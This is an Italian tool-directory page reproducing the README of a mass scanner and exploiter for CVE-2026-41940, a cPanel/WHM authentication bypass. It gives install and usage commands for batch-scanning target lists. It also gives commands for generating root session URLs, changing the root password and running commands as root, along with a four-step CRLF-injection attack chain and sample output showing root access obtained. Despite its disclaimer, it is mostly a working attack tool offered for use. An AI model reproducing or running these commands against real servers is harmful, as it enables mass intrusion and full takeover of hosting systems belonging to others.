Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-41940 — cPanel/WHM CVE-2026-41940 - Scanner di Massa ed Exploiter | Kitploit
Strumenti/GitHubGitHub/lutfifakee-project/cve-2026-41940
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingCommand and ControlAutenticazioneRed TeamingSviluppo Payload
GitHublutfifakee-project/cve-2026-41940

CVE-2026-41940

cPanel/WHM CVE-2026-41940 - Scanner di Massa ed Exploiter

23 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi RepositorySito web

CVE-2026-41940 - Scanner e Strumento di Exploit per il Bypass dell'Autenticazione cPanel/WHM

Python License Security Tested on

Scanner e strumento di exploit per il bypass dell'autenticazione cPanel/WHM per CVE-2026-41940


⚠️ Avvertenza

Questo strumento è fornito esclusivamente per scopi educativi e test di sicurezza autorizzati.

Utilizzando questo strumento, accetti che:

  • Effettuerai test solo su sistemi che possiedi o per i quali disponi di esplicita autorizzazione scritta.
  • Comprendi che l'accesso non autorizzato a sistemi informatici è illegale.
  • Sei l'unico responsabile delle tue azioni durante l'utilizzo di questo strumento.
  • Non puoi ridistribuire, modificare o dichiarare questo strumento come tuo.

❗ L'autore NON è responsabile di usi impropri, attività illegali, danni o conseguenze legali derivanti dall'utilizzo di questo strumento.


🎯 Panoramica

CVE-2026-41940 è una vulnerabilità critica di bypass dell'autenticazione in cPanel/WHM che può consentire agli aggressori di ottenere accesso root non autorizzato senza credenziali valide.

Questo strumento fornisce un'implementazione basata su Python per:

  • Rilevare target vulnerabili
  • Automatizzare lo sfruttamento (per test autorizzati)
  • Eseguire scansioni su larga scala

🔥 Catena di attacco in 4 fasi


✨ Funzionalità


📋 Requisiti

root@kitploit:~
Python 3.7+
pip install requests urllib3

🚀 Installazione

root@kitploit:~
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt

# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com

📖 Utilizzo

Comandi di base

root@kitploit:~
# Single target
python cpanel-mass-checker.py -u https://target.com:2087

# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20

# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt

# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com

# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com

# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com

# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com

📄 Formato del file dei target (targets.txt)

root@kitploit:~
# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083

⚙️ Parametri


📊 Output di esempio

Scansione batch

root@kitploit:~
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt

Generazione URL di sessione

root@kitploit:~
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
    https://example.com:2087/cpsessXXXXXXX/

🛡️ Dettagli della vulnerabilità

CampoValore
CVECVE-2026-41940
GravitàCritica (CVSS 9.8)
Vettore d'attaccoRete
Privilegi richiesti

Versioni interessate

  • WHM 11.110.x < 11.110.0.97
  • WHM 11.118.x < 11.118.0.63
  • WHM 11.126.x < 11.126.0.54
  • WHM 11.132.x < 11.132.0.29
  • WHM 11.134.x < 11.134.0.20
  • WHM 11.136.x < 11.136.0.5

⚠️ Note importanti

  • Utilizzare solo su sistemi autorizzati
  • I token di sessione scadono rapidamente
  • L'RCE potrebbe fallire su licenze limitate
  • Alcuni target richiedono -hostname
  • Tutto il traffico utilizza HTTPS

🧪 Ambiente di test

Per test sicuri e legali:

  • Utilizza il tuo VPS/server
  • Configura un ambiente di laboratorio vulnerabile
  • Ottieni sempre un'autorizzazione scritta

⭐ Supporto

Se questo progetto ti è stato utile, considera di lasciare una ⭐

Scarica lo strumento
FaseDescrizione
1. Pre-autenticazioneInvia credenziali non valide a /login/ per ottenere il cookie whostmgrsession
2. Iniezione CRLFInietta un newline tramite l'header Authorization: Basic per divulgare il token cpsess
3. Propagazione del tokenAttiva do_token_denied per propagare il token nella cache
4. VerificaAccede a /json-api/version per confermare l'accesso root a WHM
FunzionalitàDescrizione
🔄 Scansione batchScansiona più target contemporaneamente
🎯 Target singoloScansiona un singolo target con output dettagliato
🔌 Scansione porteScansione automatica delle porte WHM (2082, 2083, 2086, 2087)
🔓 URL di sessioneGenera un URL di login WHM con un clic
💀 RCEEsegue comandi di sistema come root
🔑 Cambio passwordModifica la password di root di WHM
📡 Chiamate API WHMChiama le funzioni API di WHM
🎨 Output coloratoOutput visivo per i risultati
💾 Esporta risultatiSalva i target vulnerabili in un file
ParametroDescrizioneEsempio
-uURL del target singolo-u https://target.com:2087
-fFile della lista dei target-f targets.txt
-cConcorrenza (thread)-c 20
-oFile di output-o results.txt
-hostnameHeader Host personalizzato-hostname cpanel.target.com
--scan-portsScansiona tutte le porte WHM--scan-ports
-sessionGenera URL di login-session
-passwdCambia password di root-passwd "NewPass123"
-cmdEsegui comando-cmd "id"
-keepMantieni account temporaneo-keep
-apiChiama API WHM-api listaccts
-api-paramsParametri API-api-params "user=root,password=123"
Nessuno
Interazione utenteNessuna